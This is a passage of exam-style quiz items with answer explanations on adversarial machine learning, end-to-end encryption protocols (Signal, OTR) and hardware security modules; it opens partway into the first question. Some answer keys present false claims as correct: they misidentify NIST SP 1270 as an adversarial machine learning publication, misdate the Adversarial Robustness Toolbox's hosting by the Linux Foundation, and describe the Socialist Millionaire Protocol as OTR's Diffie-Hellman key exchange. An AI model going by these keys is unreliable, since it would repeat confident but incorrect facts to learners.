2. The 2021 NIST Special Publication 1270, titled 'Towards a Practice of Adversarial Machine Learning', identifies data poisoning as a primary threat vector where malicious training samples are injected to degrade model performance.
3. Project Adversarial Robustness Toolbox (ART), an open-source library hosted by the Linux Foundation since 2018, provides developers with tools to evaluate and defend machine learning models against evasion and poisoning attacks.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 1 is correct. Statement 2 is correct. Statement 3 is correct.
Statement 1 is correct as FGSM, proposed by Goodfellow et al. in 2014, creates adversarial perturbations by moving input data in the direction of the loss function's gradient. Statement 2 is correct because NIST SP 1270, published in 2021, explicitly categorizes data poisoning as a major threat where attackers compromise training data to induce model misbehavior. Statement 3 is correct as the Adversarial Robustness Toolbox (ART), hosted by the Linux Foundation, is a widely recognized open-source library specifically designed to help developers implement defenses against evasion, poisoning, extraction, and inference attacks.
Consider the following statements regarding End-to-end encryption protocols:
1. In the context of the Signal Protocol, the X3DH (Extended Triple Diffie-Hellman) key agreement protocol is used to establish a shared secret key between two parties who are not simultaneously online.
2. The Signal Protocol utilizes the Double Ratchet Algorithm to provide forward secrecy and post-compromise security for asynchronous messaging.
3. The OTR (Off-the-Record) Messaging protocol, introduced in 2004, incorporates the Perfect Forward Secrecy mechanism and utilizes the RSA-4096 algorithm for its primary key exchange process.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 1 is correct. Statement 2 is correct. Statement 3 is incorrect.
Statement 1 is correct because X3DH allows asynchronous key agreement by using pre-keys stored on a server, enabling secure communication even when one party is offline. Statement 2 is correct as the Double Ratchet Algorithm derives new keys for every message, ensuring both forward secrecy and post-compromise security (self-healing). Statement 3 is incorrect because OTR primarily utilizes the Diffie-Hellman key exchange (specifically the Socialist Millionaire Protocol) rather than RSA-4096 for its primary key exchange process.
Consider the following statements regarding Hardware Security Modules:
1. Hardware Security Modules typically implement the Diffie-Hellman key exchange algorithm within their secure boundary to enable the secure transmission of private keys to external software-based key management systems.
2. Network-attached HSMs utilize the KMIP protocol, which was finalized by OASIS in 2010, to facilitate the direct transfer of unencrypted master keys between different vendor-specific cryptographic modules.
3. The Trusted Platform Module (TPM) 2.0 specification, released in 2014, functions as a high-throughput HSM designed to perform bulk data encryption for large-scale database servers in enterprise data centers.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 1 is incorrect. Statement 2 is incorrect. Statement 3 is incorrect.
All statements are incorrect: HSMs are designed to prevent the extraction of private keys, meaning they never export them in plaintext to external software. The KMIP protocol is used for managing key lifecycles rather than transferring unencrypted master keys between modules, which would violate fundamental security principles. Finally, a TPM is a low-throughput, specialized microcontroller meant for platform integrity and small-scale cryptographic operations, not for high-throughput bulk data encryption in enterprise servers.